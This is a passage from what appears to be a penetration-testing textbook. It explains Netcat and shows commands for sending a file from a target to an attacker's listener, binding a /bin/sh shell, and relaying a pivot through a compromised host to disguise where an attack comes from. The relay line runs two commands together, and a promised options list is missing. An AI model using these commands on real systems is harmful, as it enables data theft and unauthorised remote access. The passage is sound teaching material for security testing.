Netcat is a command-line utility used to read from or write to TCP, UDP, or Unix domain socket network connections. Highly versatile, it has been called the "Swiss Army knife" of hacking tools. It can create or connect to a TCP server, act as a simple proxy or relay, transfer files, launch executables (such as the backdoor shells mentioned previously) when a connection is made, test services and daemons, and even port scan. Netcat has been ported to most desktop platforms and has inspired similar tools such as Ncat and Simple Netcat for Android.
The basic syntax of Netcat is nc [options] [target address] [port(s)]. Common options include the following.
In addition to the standard bind and reverse shell commands mentioned previously, you can use Netcat in other ways to facilitate persistence. For example, let's say you want to exfiltrate a file called data.txt from a target system onto your attack machine. The process is similar to setting up a reverse shell. On the attack machine, set up the listener and output the file:
nc -lp 12345 > data.txt
Then, on the target machine, start the connection and pass in the file:
nc 192.168.1.10 12345 < data.txt
Your listener will grab the file and then save it.
You can also use Netcat to create a relay using a Linux named pipe. The listener waits for incoming data on local port 12345 and then forwards it to port 54321 of a second target host (192.168.1.100). First, start a listener on your attack machine:
nc -lp 12345
Then, start a listener on the second target host that binds a shell:
nc -lp 54321 -e /bin/sh
On the initial target host, create a named pipe and set up the relay:
mknod backpipe p nc 192.168.1.10 12345 0<backpipe | nc 192.168.1.100 54321 | tee backpipe
Now, any commands issued from your attack machine will be relayed through the initial target host and hit the second target host. Relaying data like this can help you pivot your attack and make it appear as if the initial target host is the one attacking the second target host.
Note: For additional Netcat examples, see the SANS Netcat Cheat Sheet at https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf